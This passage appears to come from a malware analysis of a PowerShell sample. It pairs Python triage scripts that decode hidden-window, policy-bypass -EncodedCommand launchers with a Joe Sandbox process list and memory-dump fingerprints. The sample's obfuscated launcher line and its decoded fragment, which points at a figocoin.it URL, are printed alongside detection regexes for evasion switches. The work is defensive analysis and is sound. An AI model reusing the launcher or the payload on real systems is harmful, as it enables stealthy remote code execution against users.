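# Constructed input: the first line of 6471bc8dac218.ps1 as shown in the
# File Content Preview above (BOM dropped; the base64 is truncated there).
PREVIEW_LINE = (
    "powershell -nop -ep bypass -win hid -enc "
    "YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoA"
    "LwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0A"
    "PQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQB"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...). The mandatory whitespace after the switch forces a whole-token
# match, so short alternatives cannot swallow -ep or -executionpolicy.
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1))
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:" + _PREFIXES + r")\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Patterns for the other evasion-flavoured switches (author's choice).
SWITCHES = {
    "no_profile": r"-nop(?:rofile)?\b",
    "ep_bypass": r"-e(?:p|xecutionpolicy)\s+bypass\b",
    "hidden_window": r"-w(?:in|indowstyle)?\s+hid(?:den)?\b",
}


def decode_encoded_command(b64):
    """Decode an -EncodedCommand blob: base64 of the script in UTF-16LE."""
    b64 = b64.strip()
    b64 += "=" * (-len(b64) % 4)            # a truncated blob lacks padding
    raw = base64.b64decode(b64)
    # A truncated blob may end in half a UTF-16 code unit; 'ignore' drops it.
    return raw.decode("utf-16-le", errors="ignore")


def extract_encoded_commands(cmdline):
    """Every decoded -EncodedCommand payload found in a command line."""
    return [decode_encoded_command(blob) for blob in ENC_RE.findall(cmdline)]


def urls_in(text):
    return URL_RE.findall(text)


def suspicious_switches(cmdline):
    """Names of the evasion switches present in the command line."""
    found = {name for name, pat in SWITCHES.items() if re.search(pat, cmdline, re.I)}
    if ENC_RE.search(cmdline):
        found.add("encoded_command")
    return found


def triage(cmdline):
    """One-shot summary: switches, decoded payload(s) and URLs inside them."""
    decoded = extract_encoded_commands(cmdline)
    return {
        "switches": sorted(suspicious_switches(cmdline)),
        "decoded": decoded,
        "urls": [u for d in decoded for u in urls_in(d)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(PREVIEW_LINE), indent=2))
```

On the preview line the decoded payload reads cd $env:AppData; $link='https://figocoin.it/auth.php'; $rnum=Get-Random -minimu, which ties the sample to the figocoin.it URL seen in process memory and to the random-suffixed TeamViewer_3533 folder in the Run key. The same decoder applies to the child process command line, where the full blob is available.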
                No network behavior found

Target ID: 0
Start time: 09:31:59
Start date: 28/05/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1
Imagebase: 0x7ff776e60000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 1
Start time: 09:31:59
Start date: 28/05/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 09:32:02
Start date: 28/05/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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
Imagebase: 0x7ff776e60000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high
Memory Dump Sources (Joe Sandbox IDA Plugin)

Eight function fingerprints were taken from two powershell.exe (PID 2220, Target ID 0) memory regions. For every entry the API ID, String ID and API String ID fields are empty, the Opcode Fuzzy Hash equals the Opcode ID, and the Uniqueness Score is -1.00%.

1. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: 0e4e1aacf61e6ea4e56e6c628697e31ed2e6252dca63fed62396d70da26bac61
   Instruction ID: 8d9c78aad49841ecd04358ed8a7fa6b26eb04fb0f99c2ce447f6ebdfdd0a5804
   Instruction Fuzzy Hash: 61420770A1CA4D8FDB89DF2CC495AA977E1FF59310F1441BDD84AD72A6CA35E882C780

2. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: 6b71792abca8cfb18759b78c7513b2b5dcd91324a99e3aa85e0a1bc403c10775
   Instruction ID: cf26b36b352f17a49b4413dffcd1505f55fb829e29ca53a703f35ae1262c4658
   Instruction Fuzzy Hash: 35E104B280E7866FE712DB38E8D55E57FE0EF1321571C00FAD494C74A3DA16A896C3A1

3. Source File: 00000000.00000002.471654869.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbac040000_powershell.jbxd
   Opcode ID: 203b61e0a3159b43c1bb88faaede13bae2a5d64f1632430d097d10cfa771fb8d
   Instruction ID: 701407fcdf7c3b1c164c91de4325635b8ee5315c4807be6420ef27f05c2221c7
   Instruction Fuzzy Hash: 08C128F1A0EA8A4FEBA6D77888595B67FA1EF55310F0800FAD84DC71D3DA18E816C351

4. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: 25f27c6f28ccc3565e77a53780c00f7eac5b486c94bcd7111b271ecb3c11d635
   Instruction ID: 6c5d92310ace98198317a8da5613606f2ccf8a2e28fb84cd54de81ca649c4c2c
   Instruction Fuzzy Hash: 42B1F8B280E7865FE712CB78E8D15E57FA0FF1321572C00FAD495C64A3DA16B86AC360

5. Source File: 00000000.00000002.471654869.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbac040000_powershell.jbxd
   Opcode ID: ad61d7bbb6bd3810e3d54fce6e02face5dd7b64d3c2956923dddb0d5989064ea
   Instruction ID: 99f730b285f61aa1f0499cc97fb3f67c5137ac9b06b9bae31f107ff9161b5c08
   Instruction Fuzzy Hash: 8551F3F6A0E68A4FEFABD77889681797B91AF15240F1800FAC84DCB1D3CA18EC55C315

6. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: e72e9ed31a3fc35c63aedfaefe78aaaf1d1a3c3077043213a23c0c5968bc92a9
   Instruction ID: cf434e84879ddba92cb2e14e23a774facad1a486cf40311850d121f7c2559d05
   Instruction Fuzzy Hash: CE01677115CB0C4FDB48EF0CE451AA6B7E0FB95324F10056DE58AC3661DA36E892CB45

7. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: 2ed0c7d59f641ab1d145f30d9d048c782422b52418399bc47c239112e0cdfc4d
   Instruction ID: b50496350f9b0ac77a954c48fd7bd2b2bf204efbddf457a4742999b04a8215f0
   Instruction Fuzzy Hash: 3CF0373275C6044FDB4CAA1CF4429B573D1E799321B00016EE48BC2697D927E8438685

8. Source File: 00000000.00000002.471278725.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false; Snapshot File: hcaresult_0_2_7ffbabf70000_powershell.jbxd
   Opcode ID: e3f4f11903e7bff0d8f3fdd3afcf2c100a3fba2543a5fbf3067ffa9064ee9bdd
   Instruction ID: 22cce13173ba20ba3bf41b4b781ba555b071aecc93914b0137f62f01aa080995
   Instruction Fuzzy Hash: 96F0303275C6088FDB4CEA1CF8829B573E1EB99324B00056EE48BC3657D926E847CA85

                  Execution Graph

                  Execution Coverage: 6.1%
                  Dynamic/Decrypted Code Coverage: 0%
                  Signature Coverage: 0%
                  Total number of Nodes: 8
                  Total number of Limit Nodes: 0
                  Execution graph (rendered from the edge list; the original is an image):
                    7ffbabf771b0 -> 7ffbabf771be -> 7ffbabf771c8 [RtlEncodePointer] -> 7ffbabf771fb
                                    7ffbabf771be -> 7ffbabf771fb
                    7ffbabf8a020 -> 7ffbabf8a02e -> 7ffbabf8a038 [RtlDecodePointer] -> 7ffbabf8a06b
                                    7ffbabf8a02e -> 7ffbabf8a06b

                  Control-flow Graph

                  (image with Executed / Not Executed legend; summarised here from its edge list)
                    function 7ffbabf7aa2a-7ffbabf7b315, about 75 basic blocks;
                    calls 7ffbabf75fb8 (from block 7ffbabf7aa75-7ffbabf7aabc), 7ffbabf75028 (from 7ffbabf7ab67-7ffbabf7ab83 and 7ffbabf7ab91-7ffbabf7aba8), 7ffbabf760b8 (from 7ffbabf7b2cc-7ffbabf7b2d5) and 7ffbabf760c8 (from 7ffbabf7b2e8-7ffbabf7b2ff);
                    exit block 7ffbabf7b306-7ffbabf7b315.
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: HJq
                  • API String ID: 0-3558344305
                  • Opcode ID: 8b32274a146dd135dd57c4ce42a293f33fa1a78dd684ee02bdd2a3d5e728acc5
                  • Instruction ID: 69569e1cd0cf662a45225973443f85e50d193c41e3324833aebe43b4c60999e7
                  • Opcode Fuzzy Hash: 8b32274a146dd135dd57c4ce42a293f33fa1a78dd684ee02bdd2a3d5e728acc5
                  • Instruction Fuzzy Hash: 2452A371A18A4D8FEB59EB68C4556BD77E2FF58300F1540BDD40ED32A6DE39A882CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (image with Executed / Not Executed legend; summarised here from its edge list)
                    function 7ffbabf89fa1-7ffbabf8a093, 11 basic blocks; block 7ffbabf8a038-7ffbabf8a069 calls RtlDecodePointer; exit block 7ffbabf8a07c-7ffbabf8a093.
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b1bf7455b556e51257d020e69a383cbbf54dacba025272f419ac722c2df7b23
                  • Instruction ID: 58144e0462dfdd1f4b586b93f1b797d8d390f6b9fc0ab4222ec98c3e44a45c30
                  • Opcode Fuzzy Hash: 8b1bf7455b556e51257d020e69a383cbbf54dacba025272f419ac722c2df7b23
                  • Instruction Fuzzy Hash: 54316B7080DA8C5FDB5ADB7C9808BF57BE0EB96320F04817FD059C31A2DA651819C791
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (image with Executed / Not Executed legend; summarised here from its edge list)
                    function 7ffbabf77145-7ffbabf77223, 7 basic blocks; block 7ffbabf771c8-7ffbabf771f9 calls RtlEncodePointer; exit block 7ffbabf7720c-7ffbabf77223.
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7852dfbb969156d93ab866de03e6c0821657c27c6991874fb30fae771e1ce6
                  • Instruction ID: 563db85ee8f7a75999514b3b1f41fd75d1ed00ef35a681674a3a674162cd5a97
                  • Opcode Fuzzy Hash: 3d7852dfbb969156d93ab866de03e6c0821657c27c6991874fb30fae771e1ce6
                  • Instruction Fuzzy Hash: 3731567190CA4C5FEB59DB28D8097F97BF0EB96320F0882AFD049C3163CB656856CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (image with Executed / Not Executed legend; summarised here from its edge list)
                    function 7ffbabf8a020-7ffbabf8a093, 5 basic blocks; block 7ffbabf8a038-7ffbabf8a069 calls RtlDecodePointer; exit block 7ffbabf8a07c-7ffbabf8a093.
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID: DecodePointer
                  • String ID:
                  • API String ID: 3527080286-0
                  • Opcode ID: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
                  • Instruction ID: 7e414ddba09f2199664877fadd00c354189ebf17c812d5862f03bb3de602503d
                  • Opcode Fuzzy Hash: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
                  • Instruction Fuzzy Hash: 1901B57150CA4C8EDB59EB6CD409BE477E0F799321F00822BC219C3551D7755059CBC0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (image with Executed / Not Executed legend; summarised here from its edge list)
                    function 7ffbabf771b0-7ffbabf77223, 5 basic blocks; block 7ffbabf771c8-7ffbabf771f9 calls RtlEncodePointer; exit block 7ffbabf7720c-7ffbabf77223.
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: e06df92eace4c760c119106f8245d414b16f926b0845264fbad8c30c8d38458a
                  • Instruction ID: 2fc7feed18c7cbb3b37cccdc1104f8d28b53229b5e68614924b4d82addabddc2
                  • Opcode Fuzzy Hash: e06df92eace4c760c119106f8245d414b16f926b0845264fbad8c30c8d38458a
                  • Instruction Fuzzy Hash: 4E01B17154CA0C8EEB59DB6CD0097E8BBF0F795331F00822ED819C3561D3B5A0A5CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: gr
                  • API String ID: 0-2602249913
                  • Opcode ID: 0273a2c9d6c03be31df333ffb93261a4d8a7ba0de2c76563c55c6c09e21b4f69
                  • Instruction ID: 637b8cc99d2d0327db4a97824fe20a45ba2ab5d12a6ec8c1ea0482d1b2bf9ff5
                  • Opcode Fuzzy Hash: 0273a2c9d6c03be31df333ffb93261a4d8a7ba0de2c76563c55c6c09e21b4f69
                  • Instruction Fuzzy Hash: 234147E2A4EAC64FFBBAD7388C691766BD1EF65210B1800FAC849C71D3DE08DC198345
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: gr
                  • API String ID: 0-2602249913
                  • Opcode ID: 64c117afeab66a667955eb9e613515238bd0056669ab5b00575836d94339e230
                  • Instruction ID: 5cf134faf3e77455d2077f03bc56e49fb504c9b6d35e18e881752c200bfe9c2e
                  • Opcode Fuzzy Hash: 64c117afeab66a667955eb9e613515238bd0056669ab5b00575836d94339e230
                  • Instruction Fuzzy Hash: 4621D3E2E4E6C74FFABAD7384C591766AD1EF65250B1800BAC44DC70D3EA189C198315
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e31705167a687bfd76528fa9c6d144a070a5984bedae5dd55e280cb81a40503
                  • Instruction ID: 31826ff3f792a4a523551e2eb5f9130eade87c8a199d3d95eb6f3c904bc14353
                  • Opcode Fuzzy Hash: 7e31705167a687bfd76528fa9c6d144a070a5984bedae5dd55e280cb81a40503
                  • Instruction Fuzzy Hash: 32D158B290EA894FEBB6D7A888595B67BE1EF55300F0800FAD44EC71D3DE18E816C751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c69d99761d7531492306c09fe03105b5bace7e31be9c46133eacf3a55d5d0c30
                  • Instruction ID: 8f95ba8011503283fb3e9c9e48b9f0e5f5ec5ae3033b942f448fdd555e94cd03
                  • Opcode Fuzzy Hash: c69d99761d7531492306c09fe03105b5bace7e31be9c46133eacf3a55d5d0c30
                  • Instruction Fuzzy Hash: 1D51C4F2A0EA8A4FEBF7D7A885691796BD1EF55200F0800F9C84EC71C7CE18D8158755
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: `_^$`_^$`_^$`_^
                  • API String ID: 0-4101248720
                  • Opcode ID: 2626584fd5f39a67c7f92f5beea95046f9ae167e1a4f284db063c86c11a8baed
                  • Instruction ID: 1671c5c7bb71b950615faa14dffa0ff26a8b0c17ff3cd971705daeda7fa62719
                  • Opcode Fuzzy Hash: 2626584fd5f39a67c7f92f5beea95046f9ae167e1a4f284db063c86c11a8baed
                  • Instruction Fuzzy Hash: 8231E297C0DAC64FD7534B7898690A33FA4AF53329B1D41F2C8D58B0A7EA061C09C7A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ddf4ba4b3c174f4178787f4d96749d9fafafceec19306b7a4a3b846341b04b4
                  • Instruction ID: 87a373b1950fbdc5ad27126704be3738e1450bd8f7e7517d839a8bb33b96ff30
                  • Opcode Fuzzy Hash: 7ddf4ba4b3c174f4178787f4d96749d9fafafceec19306b7a4a3b846341b04b4
                  • Instruction Fuzzy Hash: 80E1F567D5D3894FDB52DB7C94A50D23FA0EF47229B1802FBC4D2CA0A3DA15580AE3E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
                  • Instruction ID: 7ab5a16e82a6be9a6438c7d375ccd8f3355fe8b3e51812c85a1dbe46d00bb2d5
                  • Opcode Fuzzy Hash: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
                  • Instruction Fuzzy Hash: 1151A06B95E3C94FD363CAB8A8A60D6BF70EE5313572901F7C4818F0A79510295DE3B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
                  • Instruction ID: 100ac20200941e1e1270e344bad916951acc3ad9d6685b15f9063f1df6e8bb00
                  • Opcode Fuzzy Hash: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
                  • Instruction Fuzzy Hash: 8C51A26B95E3CA4FD363CEB8A4A50D6BF70EE5313532902F7C4918E0A79510255DE3B2
                  Uniqueness

                  Uniqueness Score: -1.00%
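The function records above (Memory Dump Source / Similarity / Uniqueness blocks) are a fixed text format, and triage usually wants them as data: which dumped functions wrap which Windows API, and which records are near-copies of one another (the two Instruction Fuzzy Hashes immediately above differ in only a handful of hex digits). The script below is an added example, not Joe Sandbox code and not from this report; its sample input is three records copied from this section, and the nibble-wise Hamming distance it uses to compare fuzzy hashes is an assumption made for triage, since the report does not describe Joe Sandbox's own similarity computation.

```python
"""Parse Joe Sandbox function records (Similarity / Uniqueness blocks) into
dicts, index them by API ID, and flag near-identical Instruction Fuzzy Hashes."""
import re
from itertools import combinations

# Constructed sample: three records copied from this report section (process 2,
# the child powershell.exe). The real section carries many more records.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
Similarity
• API ID: DecodePointer
• String ID:
• API String ID: 3527080286-0
• Opcode ID: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
• Instruction ID: 7e414ddba09f2199664877fadd00c354189ebf17c812d5862f03bb3de602503d
• Opcode Fuzzy Hash: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
• Instruction Fuzzy Hash: 1901B57150CA4C8EDB59EB6CD409BE477E0F799321F00822BC219C3551D7755059CBC0
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
• Instruction ID: 7ab5a16e82a6be9a6438c7d375ccd8f3355fe8b3e51812c85a1dbe46d00bb2d5
• Opcode Fuzzy Hash: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
• Instruction Fuzzy Hash: 1151A06B95E3C94FD363CAB8A8A60D6BF70EE5313572901F7C4818F0A79510295DE3B2
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
• Instruction ID: 100ac20200941e1e1270e344bad916951acc3ad9d6685b15f9063f1df6e8bb00
• Opcode Fuzzy Hash: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
• Instruction Fuzzy Hash: 8C51A26B95E3CA4FD363CEB8A4A50D6BF70EE5313532902F7C4918E0A79510255DE3B2
Uniqueness
Uniqueness Score: -1.00%
"""

# A record field is "<bullet> Name: value"; the value may be empty.
FIELD = re.compile(r"^[•\-*]?\s*([A-Za-z ]+?):\s*(.*)$")


def parse_records(text):
    """One dict per 'Memory Dump Source' block, keyed by its 'Name: value' fields."""
    records = []
    for chunk in re.split(r"^Memory Dump Source$", text, flags=re.M)[1:]:
        fields = (FIELD.match(line.strip()) for line in chunk.splitlines())
        records.append({m.group(1).strip(): m.group(2).strip() for m in fields if m})
    return records


def nibble_distance(h1, h2):
    """Differing hex digits between two equal-length fuzzy hashes (plain Hamming
    distance; an assumption for triage, not Joe Sandbox's own comparison)."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length")
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))


def api_index(records):
    """Snapshot file -> API ID -> Opcode IDs of the functions that call that API."""
    index = {}
    for rec in records:
        api = rec.get("API ID", "")
        if api:
            snap = rec.get("Snapshot File", "?")
            index.setdefault(snap, {}).setdefault(api, []).append(rec["Opcode ID"])
    return index


def near_duplicates(records, max_distance):
    """(opcode_a, opcode_b, distance) for record pairs whose Instruction Fuzzy
    Hashes differ in at most max_distance hex digits, closest pairs first."""
    pairs = []
    for a, b in combinations(records, 2):
        ha, hb = a.get("Instruction Fuzzy Hash", ""), b.get("Instruction Fuzzy Hash", "")
        if ha and hb and len(ha) == len(hb) and nibble_distance(ha, hb) <= max_distance:
            pairs.append((a["Opcode ID"], b["Opcode ID"], nibble_distance(ha, hb)))
    return sorted(pairs, key=lambda p: p[2])


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for snap, apis in api_index(recs).items():
        for api, ids in apis.items():
            print(f"{snap}: {api} <- {len(ids)} function(s)")
    for a, b, d in near_duplicates(recs, max_distance=15):
        print(f"near-duplicate ({d} of 70 nibbles differ): {a[:12]}... ~ {b[:12]}...")
```

Run it as a script to print the API index and the near-duplicate pairs; `max_distance` is a threshold to tune against the whole section rather than a fixed value. One caveat when reading these records: every Snapshot File in this section is named `hcaresult_*_powershell.jbxd`, so they describe code found in the two powershell.exe processes' memory, and a small wrapper around RtlEncodePointer or RtlDecodePointer is ordinary runtime code, not on its own evidence of what the script's payload does.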